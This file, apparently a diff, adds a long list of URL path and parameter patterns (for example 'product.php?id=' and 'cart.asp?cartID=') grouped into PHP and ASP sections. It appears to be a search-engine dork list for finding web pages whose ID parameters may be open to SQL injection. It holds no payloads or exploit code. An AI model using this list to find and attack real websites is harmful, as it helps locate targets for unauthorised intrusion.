+shop/index.php?cat_id=
+tourism/details.php?id=
+catalog/index.php?cPath=
+ViewPodcast.php?id=
+profile.php?objID=
+item_show.php?itemID=
+press_releases/press_releases.php?id=
+print.php?sid=
+gallery/categoria.php?id_cat=
+obj/print.php?objId=
+print.php?sid=
+nuell/item_show.php?itemID=
+products/products.php?p=
+products/item_show.php?itemId=
+view_ratings.php?cid=
+press_releases.php?id=
+main/content.php?id=
+shop/index.php?cat_id=
+book.html?isbn=
+shop/products.php?cat_id=
+kshop/home.php?cat=
+section.php?section=
+bearstore/store.php?cat_id=
+page_prod.php?id_cat=
+default.php?cPath=
+news.php?category=
+products/product.php?pid=
+print.php?sid=
+print.php?sid=
+show_bug.cgi?id=
+news.php?articleID=
+search/index.php?q=
+bookSingle.php?bookId=
+weekly/story.php?story_id=
+index.php?cPath=
+catalog/index.php?cPath=
+more_details.php?id=
+press_release.php?id=
+store/showcat.php?cat_id=
+m/content/article.php?content_id=
+article.php?id=
+viewstore.php?cat_id=
+shop.php?id_cat=
+news/press-announcements/press_release.php?press_id=
+publication/ontarget_details.php?oid=
+product_details.php?prodID=
+print.php?sid=
+specials.php?osCsid=
+category_view.php?category_id=
+book_dete.php?bookID=
+index.php?cPath=
+events.php?pid=
+articles/index.php?id=
+category.php?cat_id=
+html/products_cat.php?cat_id=
+more_details.php?id=
+preview.php?pid=
+product.php?productid=
+Product.php?Showproduct=
+bbs/view.php?tbl=
+news.php?id=
+details/food.php?cid=
+products.php?cat=
+calendar/week.php?cid=
+print.php?id=
+itemlist.php?categoryID=
+fshstatistic/index.php?&PID=
+press_release/release_detail.php?id=
+product.php?prod_num=
+products.php?page=
+con_product.php?prodid=
+mp-prt.php?item=
+notice/notice_****.php?id=
+showproducts.php?cid=
+site/?details&prodid=
+downloads.php?file_id=
+products.php?cat_id=
+product.php?c=
+campkc-today.php?Start=
+index.php?page=
+detail.php?id=
+shop/product.php?id=
+classifieds/showproduct.php?product=
+product-details.php?prodID=
+gallery/gallery.php?id=
+adetail.php?id=
+home.php?cat=
+store/item.php?id=
+products.php?cat=
+detail.php?prodid=
+links.php?cat=
+detail.php?prodid=
+videos/view.php?id=
+resources/index.php?cat=
+dream_interpretation.php?id=
+category.php?category_id=
+html/gallery.php?id=
+item.php?id=
+category.php?ID=
+knowledge_base/detail.php?id=
+home.php?cat=
+gallery.php?id=
+category.php?c=
+index.php?area_id=
+games/play.php?id=
+tutorial.php?articleid=
+directory/showcat.php?cat=
+gallery/gallery.php?id=
+news/newsitem.php?newsID=
+site/public/newsitem.php?newsID=
+index.php?cat=
+newsitem.php?newsID=
+category.php?catid=
+gallery.php?id=
+content.php?id=
+resources/category.php?CatID=
+media.php?****=
+store/detail.php?prodid=
+display_page.php?tpl=
+calendar/item.php?id=
+item-menu.php?idSubCat=
+Blog/viewpost.php?id=
+news/newsitem.php?newsID=
+detail.php?prodid=
+printarticle.php?id=
+article.php?id=
+category.php?id=
+page.php?id=
+detail.php?prodid=
+links/resources/links_search_result.php?catid=
+news_view.php?id=
+item.php?id=
+display_page.php?elementId=
+photog.php?id=
+home.php?cat=
+categories.php?catid=
+categories.php?parent_id=
+index.php?product=
+category.php?catId=
+cm/public/news/news.php?newsid=
+content.php?page=
+volunteers/item.php?id=
+ressource.php?ID=
+extensions/extlist.php?cat=
+category.php?id=
+cms/publications.php?id=
+page.php?id=
+offer_info.php?id=
+cart/detail_prod.php?id=
+directory.php?cat=
+Shop/home.php?cat=
+categories.php?cat=
+newsitem.php?newsid=
+shareit/readreviews.php?cat=
+categories.php?cat=
+item.php?sub_id=
+index.php?area_id=
+category.php?catid=
+item.php?sub_id=
+index.php?area_id=
+now_viewing.php?id=
+categories.php?cat=
+publications/?id=
+carry-detail.php?prodID=
+tools/tools_cat.php?c=
+detail.php?prodid=
+gallery/mailmanager/subscribe.php?ID=
+painting.php?id=
+Catalog_View_Summary.php?ID=
+categories.php?parent_id=
+product-detail.php?prodid=
+newsitem.php?newsid=
+liblog/index.php?cat=
+cart/prod_subcat.php?id=
+goto.php?area_id=
+catalog.php?CAT=
+showthread.php?t=
+category.php?id=
+item.php?item=
+site/cat.php?setlang=
+item.php?id=
+videos/view.php?id=
+item.php?SKU=
+display_page.php?id=
+index.php?id=
+faq/category.php?id=
+news/newsitem.php?newsid=
+cat.php?cat=
+review.php?id=
+knowledgebase/article.php?id=
+forums/showthread.php?t=
+product_info.php?products_id=
+cart/home.php?cat=
+item.php?id=
+board/viewtopic.php?id=
+page.php?id=
+english/gallery.php?id=
+detail.php?prodid=
+detail.php?prodid=
+item.php?item_id=
+article.php?ID=
+categories.php?cat=
+media.php?****=
+home.php?cat=
+gallery/gallery.php?id=
+library.php?author=
+item.php?cat=
+cart/home.php?cat=
+vb/showthread.php?p=
+news-item.php?id=
+ads/index.php?cat=
+item.php?code=
+kids-detail.php?prodID=
+index.php?id=
+category.php?id=
+addsiteform.php?catid=
+categories.php?cat=
+newshop/category.php?c=
+news/news-item.php?id=
+product.php?proid=
+catalog/product_info.php?products_id=
+products.php?cat=
+product.php?productid=
+browsepr.php?pr=
+products.php?cat=
+productDetail.php?prodId=
+productDetail.php?prodId=
+product.php?products_id=
+product.php?productid=
+browsepr.php?pr=
+product.php?ProductID=
+product-details.php?prodId=
+product_details.php?prodid=
+product_info.php?products_id=
+product.php?id=
+browsepr.php?pr=
+products.php?cat=
+product_details.php?product_id=
+products.php?cat=
+product.php?proid=
+productlist.php?tid=
+products.php?cat=
+product_details.php?product_id=
+products/product.php?article=
+products.php?cid=
+forums/showthread.php?t=
+show_prod.php?p=
+new/showproduct.php?prodid=
+product.php?productid=
+prod.php?Cat=
+productlist.php?fid=
+product.php?pl=
+product.php?proID=
+product_details.php?product_id=
+PCMA/productDetail.php?prodId=
+product.php?proid=
+panditonline/productlist.php?id=
+productlist.php?id=
+js_product_detail.php?pid=
+prod.php?cat=
+poem.php?id=
+estore/products.php?cat=
+summary.php?PID=
+productdetails.php?prodId=
+product-details.php?prodID=
+en/product.php?proid=
+product-list.php?ID=
+main/product.php?productid=
+product.php?product=
+site/catalog.php?cid=
+resources/index.php?cat=
+SearchProduct/ListProduct.php?PClassify_3_SN=
+Products/product.php?pid=
+clear/store/products.php?product_category=
+earth/visitwcm_view.php?id=
+products.php?categoryID=
+product.php?productid=
+products/products.php?cat=
+product.php?pid=
+product.php?proid=
+home.php?cat=
+html/projdetail.php?id=
+products/index.php?cat=
+productDetails.php?prodId=
+proddetail.php?prod=
+product.php?productid=
+products.php?subgroupid=
+product_info.php?products_id=
+prod.php?cat=
+product_detail.php?prodid=
+discont_productpg.php?product_id=
+giftshop/product.php?proid=
+products.php?cat=
+product.php?product_id=
+shop/products.php?cat=
+product_info.php?products_id=
+products.php?cat=
+SearchProduct/ListProduct.php?PClassify_3_SN=
+productlist.php?id=
+products.php?cat=
+product_customed.php?pid=
+products.php?cat=
+productlist.php?id=
+product.php?id=
+materials/item_detail.php?ProductID=
+products/productdetails.php?prodID=
+product_details.php?product_id=
+products.php?cat=
+projDetail.php?id=
+main/product.php?productid=
+product_details.php?product_id=
+product.php?proid=
+ProductDetails.php?ProdID=
+store/product.php?productid=
+x/product.php?productid=
+product.php?productid=
+product.php?id=
+iam/tabbedWithShowcase.php?pid=
+reviews/index.php?cat=
+product.php?productid=
+product.php?pid=
+product.php?proid=
+mhp/my***.php?hls=
+xcart/product.php?productid=
+products.php?cat=
+xcart/product.php?productid=
+productlist.php?id=
+product_info.php?products_id=
+productlist.php?cat=
+prodrev.php?cat=
+productlist.php?id=
+projdetail.php?id=
+store/customer/product.php?productid=
+product.php?product_id=
+product.php?productid=
+products.php?cat=
+cats_disp.php?cat=
+product.php?product_id=
+productdetails.php?prodid=
+product_details.php?product_id=
+product_details.php?product_id=
+product.php?id=
+productlist.php?tid=
+ddoecom/product.php?proid=
+proddetail.php?prod=
+productlist.php?fid=
+products.php?cat=
+Products/Catsub.php?recordID=
+Products/mfr.php?mfg=
+site/catalog.php?pid=
+shop/product_details.php?ProdID=
+usar/productDetail.php?prodID=
+products/display_product.php?product_id=
+products.php?cat=
+cardIssuance/product.php?pid=
+product.php?proid=
+products.php?parent=
+products.php?catId=
+productDetail.php?prodID=
+productlist.php?fid=
+products.php?mainID=
+products.php?cat=
+product_info.php?products_id=
+product_detail.php?prodid=
+catalog/product_info.php?products_id=
+product_info.php?products_id=
+products.php?cat=
+product.search.php?proid=
+productlist.php?id=
+product.php?proid=
+product.php?pid=
+product_reviews.php?feature_id=
+product.php?product_id=
+product.php?productid=
+item.php?id=
+directorylisting.php?cat=
+historical/stock.php?symbol=
+viewtopic.php?pid=
+cc/showthread.php?t=
+category/index_pages.php?category_id=
+files.php?cat=
+vb/showthread.php?t=
+newsitem.php?newsid=
+categories.php?parent_id=
+products.php?cat=
+kshop/home.php?cat=
+publications/publication.php?id=
+category.php?Category_ID=
+item.php?ID=
+category.php?catID=
+print.php?id=
+Range.php?rangeID=
+en/mobile_phone.php?ProdID=
+news-item.php?newsID=
+newsitem.php?newsID=
+newsitem.php?newsID=
+newsitem.php?newsID=
+category.php?id_category=
+en/procurement/news-item.php?newsID=
+newsitem.php?newsID=
+product-list.php?id=
+pages/product.php?product_id=
+bug.php?id=
+showthread.php?p=
+photo_view.php?id=
+index.php?option=
+event/detail.php?id=
+fatcat/artistInfo.php?id=
+viewtopic.php?id=
+showthread.php?t=
+index.php?showtopic=
+news.php?id=
+news.php?id=
+news/index.php?ID=
+article.php?id=
+h4kurd/showthread.php?tid=
+faq/question.php?Id=
+forums/index.php?topic=
+rss.php?id=
+tak/index.php?module=
+stafflist/profile.php?id=
+manual.php?product=
+events/event.php?id=
+index.php?id=
+detail.php?id=
+detail.php?id=
+show.php?id=
+contentok.php?id=
+event_details.php?id=
+socsci/events/full_details.php?id=
+index.php?id=
+etemplate.php?id=
+index.php?id=
+anj.php?id=
+anj.php?id=
+forum/viewtopic.php?t=
+profile.php?id=
+pubs_more2.php?id=
+content.php?id=
+opportunities/bursary.php?id=
+opportunities/event.php?id=
+vb/showthread.php?p=
+events_more.php?id=
+product_detail.cfm?id=
+events/index.php?id=
+articles.php?id=
+index.php?id=
+package_info.php?id=
+news_more.php?id=
+productinfo.php?id=
+pageType2.php?id=
+news.php?id=
+news.php?id=
+artform.cfm?id=
+article.php?id=
+product.php?id=
+index.php?id=
+event_details.php?id=
+productDetails.php?id=
+faq.php?id=
+?id=
+gig.php?id=
+showthread.php?t=
+faq.php?q_id=
+events.php?pid=
+profiles/profile.php?profileid=
+ProductDetails.php?id=
+about.php?id=
+news-story.php?id=
+index.php?id=
+display-sunsign.php?id=
+news.php?id=
+product_page.php?id=
+news/news_detail.php?id=
+yarndetail.php?id=
+airactivity.cfm?id=
+earthactivity.cfm?id=
+index.php?id=
+news.php?id=
+Doncaster/events/event.php?ID=
+index.php?id=
+index.php?id=
+user/AboutAwardsDetail.php?ID=
+hw_reviews.php?id=
+page.php?area_id=
+view_company.php?id=
+
+site/marketing_article.php?id=
+articles.php?id=
+release.php?id=
+news.php?display=
+index.php?id=
+current/diary/story.php?id=
+meetings/presentations.php?id=
+product.php?fdProductId=
+featuredetail.php?id=
+featuredetail.php?id=
+news.php?id=
+shopping/index.php?id=
+feature.php?id=
+Links/browse.php?id=
+Links/browse.php?id=
+issue.php?id=
+index.php?id=
+product_details.php?id=
+article.php?id=
+index.php?id=
+product.php?brand=
+productpage.php?ID=
+newsite/events.php?id=
+show_upload.php?id=
+display_user.php?ID=
+productinfo.php?id=
+index.php?id=
+news/details.php?id=
+contact_details.php?id=
+news.php?id=
+news.php?id=
+news.php?id=
+viewevent.php?id=
+news.php?id=
+news.php?id=
+events/events.php?id=
+news/news.php?id=
+news/news.php?id=
+modsdetail.php?id=
+fitxa.php?id=
+contact.php?id=
+latestnews.php?id=
+mylink.php?id=
+products_detail.php?id=
+products_detail.php?id=
+products_detail.php?id=
+faq.php?****=
+FaqDetail.php?ID=
+content.php?id=
+profile.php?id=
+profile.php?id=
+art_page.php?id=
+brand.php?id=
+section.php?id=
+product2.php?id=
+product3.php?id=
+members/profile.php?id=
+?id=
+profile.php?id=
+info.php?id=
+general/blogpost/?p=
+event.php?id=
+index.php?id=
+faq.php?id=
+artist.php?id=
+artist.php?id=
+product_info.php?products_id=
+article.php?id=
+list_trust.php?id=
+members/member-profile.php?id=
+article.php?id=
+productview.php?id=
+news-full.php?id=
+profile.php?id=
+product.php?fdProductId=
+content.php?id=
+product.php?inid=
+event.php?id=
+review.php?id=
+newsDetails.php?ID=
+products.php?id=
+template.php?ID=
+index.php?id=
+sectionpage.php?id=
+event.php?id=
+directory/profile.php?id=
+about.php?id=
+queries/lostquotes/?id=
+products/model.php?id=
+products/model.php?id=
+product.php?id=
+index.php?id=
+event.php?id=
+news.php?id=
+animal/products.php?id=
+mp.php?id=
+policy.php?id=
+faq.php?id=
+profile.php?id=
+events/detail.php?ID=
+news/detail.php?ID=
+product-info.php?cat=
+product-info.php?cat=
+index.php?id=
+press_cutting.php?id=
+frf10/news.php?id=
+frf10/news.php?id=
+shopping.php?id=
+trainers.php?id=
+index.php?id=
+news/article.php?id=
+index.php?id=
+view-event.php?id=
+article.php?id=
+index.php?id=
+games/index.php?task=
+index.php?id=
+products/testimony.php?id=
+events/index.php?ID=
+story.php?id=
+****index/productinfo.php?id=
+games/play.php?id=
+corporate/faqs/faq.php?Id=
+users/view.php?id=
+developments_detail.php?id=
+article.php?id=
+profile/detail.php?id=
+profile/detail.php?id=
+superlinks/browse.php?id=
+player.php?id=
+index.php?id=
+index.php?Id=
+events.php?id=
+index.php?id=
+index.php?id=
+profile/newsdetail.php?id=
+links/browse.php?id=
+item.php?id=
+public_individual_sponsorship.php?ID=
+contact-us?reportCompany=
+index.php?id=
+shopping_article.php?id=
+news.php?id=
+cd.php?id=
+download_free.php?id=
+download_free.php?id=
+artist.php?id=
+download_details.php?id=
+used/cardetails.php?id=
+customer/product.php?productid=
+pressroom/viewnews.php?id=
+fatcat/artistInfo.php?id=
+worklog/task.php?id=
+viewtopic.php?id=
+showthread.php?t=
+order/cart/index.php?maincat_id=
+Featured_Site.php?id=
+index.php?option=
+prod_details.php?id=
+showthread.php?tid=
+h4kurd/showthread.php?tid=
+h4kurd/showthread.php?tid=
+index.php?coment=
+store.php?id=
+what***elieveb.php?id=
+View.php?view=
+rss.php?id=
+details.php?id=
+product.php?id=
+villa_detail.php?id=
+en/produit.php?id=
+?act=
+index.php?act=
+detail.php?id=
+index.php?showtopic=
+cc/showthread.php?p=
+cardetails.php?id=
+contentok.php?id=
+event_details.php?id=
+camp_details.php?id=
+html/101_artistInfo.php?id=
+jump.php?id=
+index.php?id=
+company_details.php?ID=
+finalrevdisplay.php?id=
+speed-dating/booking.php?id=
+page2.php?id=
+html/products.php?id=
+pubs_more2.php?id=
+events/event.php?id=
+opportunities/bursary.php?id=
+projects/project.php?id=
+venue-details.php?id=
+store/mcart.php?ID=
+index.php?id=
+index.php?id=
+details.php?id=
+blpage.php?id=
+news/articleRead.php?id=
+pageType1.php?id=
+products.php?area_id=
+memprofile.php?id=
+scripts/comments.php?id=
+index.php?page=
+press/press.php?id=
+retail/index_bobby.php?id=
+home.php?id=
+campaigns.php?id=
+merchandise.php?id=
+details.php?id=
+cardetails.php?id=
+article.php?id=
+auction_details.php?auction_id=
+abouttheregions_province.php?id=
+abouttheregions_village.php?id=
+index.php?id=
+product.php?id=
+specials/Specials_Pick.php?id=
+productDetails.php?id=
+showPage.php?type=
+booking.php?id=
+subcategory-page.php?id=
+specials.php?id=
+company/news.php?id=
+gig.php?id=
+brief.php?id=
+store/store_detail.php?id=
+ProductDetails.php?id=
+articles/index.php?id=
+about.php?id=
+viewproduct.php?id=
+carsdetail.php?id=
+index.php?id=
+index.php?id=
+news/news_detail.php?id=
+product_guide/company_detail.php?id=
+show_news.php?id=
+forum/viewtopic.php?id=
+product.php?id=
+specials.php?id=
+specials.php?id=
+subcategory.php?id=
+product.php?id=
+index.php?id=
+signed-details.php?id=
+library/article.php?ID=
+mpacms/dc/article.php?id=
+viewproduct.php?prod=
+product_detail.php?id=
+view_company.php?id=
+view.php?id=
+articles.php?id=
+release.php?id=
+release.php?id=
+book-details.php?id=
+shopping/index.php?id=
+cms/story.php?id=
+product_details.php?id=
+product.php?id=
+dataaccess/article.php?ID=
+showthread.php?p=
+auction_details.php?auction_id=
+show_upload.php?id=
+store-detail.php?ID=
+index.php?page=
+view.php?user_id=
+product.php?id=
+index.php?mwa=
+index.php?id=
+site/view8b.php?id=
+pages/events/specificevent.php?id=
+contact_details.php?id=
+static.php?id=
+products/category.php?id=
+member.php?ctype=
+projects/pview.php?id=
+section.php?parent=
+link_exchange/browse.php?id=
+gallery.php?id=
+song.php?ID=
+viewproduct.php?id=
+news_detail.php?ID=
+entertainment/listings.php?id=
+entertainment/listings.php?id=
+news/news.php?id=
+
+sport/sport.php?id=
+details.php?id=
+categories.php?id=
+franchise2.php?id=
+ad.php?id=
+latestnews.php?id=
+mylink.php?id=
+products_detail.php?id=
+products_detail.php?id=
+product.php?id=
+articles/details.php?id=
+view.php?id=
+chamber/members.php?id=
+oracle/ifaqmaker.php?id=
+carinfo.php?id=
+addpages.php?id=
+addpages.php?id=
+detail.php?id=
+cardetail.php?id=
+article.php?id=
+members/profile.php?id=
+prod_indiv.php?groupid=
+journal.php?id=
+sup.php?id=
+business/details.php?id=
+tales.php?id=
+artist.php?id=
+mens/product.php?id=
+news/news.php?id=
+joke-display.php?id=
+members/item.php?id=
+store.php?id=
+viewprofile.php?id=
+restaurant.php?id=
+details.php?id=
+product.php?id=
+trailer_detail.php?id=
+product.php?id=
+product.php?id=
+product.php?id=
+specials/nationvdo/showvdo.php?cateid=
+specials/nationvdo/showvdo.php?cateid=
+product.php?id=
+secondary.php?id=
+category.php?id=
+showthread.php?tid=
+02/forum_topic.php?id=
+history/index.php?id=
+njm/cntpdf.php?t=
+htmlpage.php?id=
+details.php?id=
+car_details.php?id=
+review.php?id=
+members.php?id=
+show_cv.php?id=
+melbourne.php?id=
+melbourne_details.php?id=
+products.php?id=
+member-details.php?id=
+custompages.php?id=
+workshopview.php?id=
+forums/index.php?topic=
+free-release.php?id=
+holidays/dest/offers/offers.php?id=
+viewproducts.php?id=
+article.php?id=
+ViewPodcast.php?id=
+pubs-details.php?id=
+product_guide/company_detail.php?id=
+viewproduct.php?id=
+site.php?id=
+mp.php?id=
+usb/devices/showdev.php?id=
+cuisine/index.php?id=
+tour.php?id=
+article.php?id=
+product_info.php?products_id=
+book2.php?id=
+subcategory.php?id=
+checknews.php?id=
+courses/course.php?id=
+promotion.php?id=
+index.php?op=
+news/viewarticle.php?id=
+blog/?p=
+categories.php?id=
+projects/detail.php?id=
+articles.php?id=
+vb/showthread.php?p=
+products/product.php?id=
+soe_sign_action.php?id=
+template1.php?id=
+trackback.php?id=
+architect_full.php?id=
+story.php?id=
+films.php?id=
+details.php?page=
+GT5/car-details.php?id=
+chalets.php?id=
+product.php?id=
+details.php?id=
+shopping.php?id=
+ss.php?id=
+feature2.php?id=
+media_display.php?id=
+products.php?id=
+car.php?id=
+courses/course-details.php?id=
+content.php?dtid=
+developments_view.php?id=
+index.php?id=
+product.php?par=
+tekken5/movelist.php?id=
+news-details.php?id=
+comedy_to_go.php?id=
+jobs.php?id=
+article/article.php?id=
+story.php?id=
+trade/listings.php?Id=
+eventdetails.php?id=
+news/show.php?id=
+superleague/news_item.php?id=
+view_article.php?id=
+product.php?productid=
+news/articleRead.php?id=
+trvltime.php?id=
+store/item.php?id=
+index.php?id=
+articles/article.php?id=
+cc/showthread.php?t=
+showthread.php?t=
+events_details.php?id=
+links/browse.php?id=
+item.php?id=
+public_individual_sponsorship.php?ID=
+booking.php?s=
+projects/view.php?id=
+Company%20Info.php?id=
+view_article.php?id=
+media.php?id=
+review.php?id=
+shopping_article.php?id=
+cd.php?id=
+index.php?p=
+canal/imap.php?id=
+display.php?id=
+bug.php?id=
+showthread.php?p=
+booking/bandinfo.php?id=
+store/store_detail.php?id=
+details.php?id=
+details.php?id=
+index.php?ID=
+prod_details.php?id=
+********.php?id=
+rss.php?id=
+solutions/item.php?id=
+en/produit.php?id=
+item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page=
+showthread.php?t=
+index.php?showtopic=
+contentok.php?id=
+liverpool/details.php?id=
+products/product.asp?ID=
+includes/top-ten/display_review.php?id=
+article.php?id=
+store/item.php?id=
+forumapc/plantfinder/details.php?id=
+ARDetail.asp?ID=
+store/mcart.php?ID=
+shop.asp?id=
+index.php?id=
+detailed_product.asp?id=
+detailed_product.asp?id=
+company.asp?ID=
+newsletter/newsletter.php?id=
+details.php?id=
+details.php?id=
+boat_plans.asp?id=
+prod_show.asp?prodid=
+prod_show.asp?id=
+fonts/details.php?id=
+articles.php?id=
+tourdetail.php?id=
+program/details.php?ID=
+abouttheregions_province.php?id=
+abouttheregions_village.php?id=
+Search_Data_Sheet.asp?ID=
+indepth/details.php?id=
+page.php?id=
+article.php?id=
+booking/bandinfo.php?id=
+store/store_detail.php?id=
+articles/index.php?id=
+event.php?id=
+cat.asp?id=
+store/news_story.php?id=
+ddoecom/index.php?id=
+product.asp?id=
+shop/shop.php?id=
+ArtistDetail.php?id=
+invent/details.php?id=
+page.php?id=
+eventtype.php?id=
+c_page.php?id=
+cms/story.php?id=
+downloads.asp?software=
+737en.php?id=
+events/event.php?id=
+auction_details.php?auction_id=
+store-detail.php?ID=
+details.php?id=
+index.php?id=
+article.php?id=
+news_detail.asp?id=
+projects/pview.php?id=
+report-detail.asp?id=
+article/index.php?id=
+store.php?id=
+artists/story/index.php?id=
+franchise2.php?id=
+article.php?id=
+rentals.php?id=
+worthies/details.php?id=
+artists/index.php?id=
+mylink.php?id=
+resource.php?id=
+category_id.php?id=
+products.asp?ID=
+detail.php?id=
+lakeinfo.php?id=
+business/details.php?id=
+news/details.php?id=
+list.php?id=
+en/visit.php?id=
+product_details.asp?id=
+store.php?id=
+viewprofile.php?id=
+lowell/restaurants.php?id=
+en/details.php?id=
+en/details.php?id=
+rca/store/item.php?item=
+Steamboat_Springs_Vacation_Rental.php?ID=
+where/details.php?id=
+htmlpage.php?id=
+details.php?id=
+details.php?id=
+melbourne.php?id=
+melbourne_details.php?id=
+products.php?ID=
+Stacks/storyprof.php?ID=
+artists.php?id=
+board/showthread.php?t=
+workshopview.php?id=
+workshopview.php?id=
+artists/details.php?id=
+displayArticle.php?id=
+event.php?id=
+services_details_description.php?id=
+product.asp?id=
+WhitsundaySailing.php?id=
+nl/default.asp?id=
+directory/listing_coupons.php?id=
+exhibitions/details.php?id=
+details.php?id=
+page.php?id=
+cheats/details.php?ID=
+media_display.php?id=
+********.php?id=
+articles.php?id=
+index.php?id=
+video.php?id=
+news-details.php?id=
+details.php?id=
+press2.php?ID=
+products/treedirectory.asp?id=
+events/details.php?id=
+calendar/event.php?id=
+page.php?id=
+ficha.php?id=
+links/browse.php?id=
+wwdsemea/default.asp?ID=
+forum/showthread.php?t=
+media.php?id=
+review.php?id=
+store/item.php?id=
+
+asp
+ßæÏ:
+
+about.asp?cartID=
+accinfo.asp?cartId=
+acclogin.asp?cartID=
+add.asp?bookid=
+add_cart.asp?num=
+addcart.asp?
+addItem.asp
+add-to-cart.asp?ID=
+addToCart.asp?idProduct=
+addtomylist.asp?ProdId=
+adminEditProductFields.asp?intProdID=
+advSearch_h.asp?idCategory=
+affiliate.asp?ID=
+affiliate-agreement.cfm?storeid=
+affiliates.asp?id=
+ancillary.asp?ID=
+archive.asp?id=
+article.asp?id=
+aspx?PageID
+basket.asp?id=
+Book.asp?bookID=
+book_list.asp?bookid=
+book_view.asp?bookid=
+BookDetails.asp?ID=
+browse.asp?catid=
+browse_item_details.asp
+Browse_Item_Details.asp?Store_Id=
+buy.asp?
+buy.asp?bookid=
+bycategory.asp?id=
+cardinfo.asp?card=
+cart.asp?action=
+cart.asp?cart_id=
+cart.asp?id=
+cart_additem.asp?id=
+cart_validate.asp?id=
+cartadd.asp?id=
+cat.asp?iCat=
+catalog.asp
+catalog.asp?CatalogID=
+catalog_item.asp?ID=
+catalog_main.asp?catid=
+category.asp
+category.asp?catid=
+category_list.asp?id=
+categorydisplay.asp?catid=
+checkout.asp?cartid=
+checkout.asp?UserID=
+checkout_confirmed.asp?order_id=
+checkout1.asp?cartid=
+comersus_listCategoriesAndProducts.asp?idCategory=
+comersus_optEmailToFriendForm.asp?idProduct=
+comersus_optReviewReadExec.asp?idProduct=
+comersus_viewItem.asp?idProduct=
+comments_form.asp?ID=
+contact.asp?cartId=
+content.asp?id=
+customerService.asp?****ID1=
+default.asp?catID=
+description.asp?bookid=
+details.asp?BookID=
+details.asp?Press_Release_ID=
+details.asp?Product_ID=
+details.asp?Service_ID=
+display_item.asp?id=
+displayproducts.asp
+downloadTrial.asp?intProdID=
+emailproduct.asp?itemid=
+emailToFriend.asp?idProduct=
+events.asp?ID=
+faq.asp?cartID=
+faq_list.asp?id=
+faqs.asp?id=
+feedback.asp?title=
+freedownload.asp?bookid=
+fullDisplay.asp?item=
+getbook.asp?bookid=
+GetItems.asp?itemid=
+giftDetail.asp?id=
+help.asp?CartId=
+home.asp?id=
+index.asp?cart=
+index.asp?cartID=
+index.asp?ID=
+info.asp?ID=
+item.asp?eid=
+item.asp?item_id=
+item.asp?itemid=
+item.asp?model=
+item.asp?prodtype=
+item.asp?shopcd=
+item_details.asp?catid=
+item_list.asp?maingroup
+item_show.asp?code_no=
+itemDesc.asp?CartId=
+itemdetail.asp?item=
+itemdetails.asp?catalogid=
+learnmore.asp?cartID=
+links.asp?catid=
+list.asp?bookid=
+List.asp?CatID=
+
+listcategoriesandproducts.asp?idCategory=
+modline.asp?id=
+myaccount.asp?catid=
+news.asp?id=
+order.asp?BookID=
+order.asp?id=
+order.asp?item_ID=
+OrderForm.asp?Cart=
+page.asp?PartID=
+payment.asp?CartID=
+pdetail.asp?item_id=
+powersearch.asp?CartId=
+price.asp
+privacy.asp?cartID=
+prodbycat.asp?intCatalogID=
+prodetails.asp?prodid=
+prodlist.asp?catid=
+product.asp?bookID=
+product.asp?intProdID=
+product_info.asp?item_id=
+productDetails.asp?idProduct=
+productDisplay.asp
+productinfo.asp?item=
+productlist.asp?ViewType=Category&CategoryID=
+productpage.asp
+products.asp?ID=
+products.asp?keyword=
+products_category.asp?CategoryID=
+products_detail.asp?CategoryID=
+productsByCategory.asp?intCatalogID=
+prodView.asp?idProduct=
+promo.asp?id=
+promotion.asp?catid=
+pview.asp?Item=
+resellers.asp?idCategory=
+results.asp?cat=
+savecart.asp?CartId=
+search.asp?CartID=
+searchcat.asp?search_id=
+Select_Item.asp?id=
+Services.asp?ID=
+shippinginfo.asp?CartId=
+shop.asp?a=
+shop.asp?action=
+shop.asp?bookid=
+shop.asp?cartID=
+shop_details.asp?prodid=
+shopaddtocart.asp
+shopaddtocart.asp?catalogid=
+shopbasket.asp?bookid=
+shopbycategory.asp?catid=
+shopcart.asp?title=
+shopcreatorder.asp
+shopcurrency.asp?cid=
+shopdc.asp?bookid=
+shopdisplaycategories.asp
+shopdisplayproduct.asp?catalogid=
+shopdisplayproducts.asp
+shopexd.asp
+shopexd.asp?catalogid=
+shopping_basket.asp?cartID=
+shopprojectlogin.asp
+shopquery.asp?catalogid=
+shopremoveitem.asp?cartid=
+shopreviewadd.asp?id=
+shopreviewlist.asp?id=
+ShopSearch.asp?CategoryID=
+shoptellafriend.asp?id=
+shopthanks.asp
+shopwelcome.asp?title=
+show_item.asp?id=
+show_item_details.asp?item_id=
+showbook.asp?bookid=
+showStore.asp?catID=
+shprodde.asp?SKU=
+specials.asp?id=
+store.asp?id=
+store_bycat.asp?id=
+store_listing.asp?id=
+Store_ViewProducts.asp?Cat=
+store-details.asp?id=
+storefront.asp?id=
+storefronts.asp?title=
+storeitem.asp?item=
+StoreRedirect.asp?ID=
+subcategories.asp?id=
+tek9.asp?
+template.asp?Action=Item&pid=
+topic.asp?ID=
+tuangou.asp?bookid=
+type.asp?iType=
+updatebasket.asp?bookid=
+updates.asp?ID=
+view.asp?cid=
+view_cart.asp?title=
+view_detail.asp?ID=
+viewcart.asp?CartId=
+viewCart.asp?userID=
+viewCat_h.asp?idCategory=
+viewevent.asp?EventID=
+viewitem.asp?recor=
+viewPrd.asp?idcategory=
+ViewProduct.asp?misc=
+voteList.asp?item_ID=
+whatsnew.asp?idCategory=
+WsAncillary.asp?ID=
+WsPages.asp?ID=noticiasDetalle.asp?xid=
+sitio/item.asp?idcd=
+index.asp?site=
+de/content.asp?page_id=
+gallerysort.asp?iid=
+products.asp?type=
+event.asp?id=
+showfeature.asp?id=
+home.asp?ID=
+tas/event.asp?id=
+profile.asp?id=
+details.asp?id=
+past-event.asp?id=
+index.asp?action=
+site/products.asp?prodid=
+page.asp?pId=
+resources/vulnerabilities_list.asp?id=
+site.asp?id=
+products/index.asp?rangeid=
+global_projects.asp?cid=
+publications/view.asp?id=
+display_page.asp?id=
+pages.asp?ID=
+lmsrecords_cd.asp?cdid=
+product.asp?prd=
+cat/?catid=
+products/product-list.asp?id=
+debate-detail.asp?id=
+cbmer/congres/page.asp?LAN=
+content.asp?id=
+news.asp?ID=
+photogallery.asp?id=
+index.asp?id=
+product/product.asp?product_no=
+nyheder.htm?show=
+book.asp?ID=
+print.asp?id=
+detail.asp?id=
+book.asp?id=
+content.asp?PID=
+more_detail.asp?id=
+content.asp?id=
+view_items.asp?id=
+view_author.asp?id=
+main.asp?id=
+english/fonction/print.asp?id=
+magazines/adult_magazine_single_page.asp?magid=
+product_details.asp?prodid=
+magazines/adult_magazine_full_year.asp?magid=
+products/card.asp?prodID=
+catalog/product.asp?cat_id=
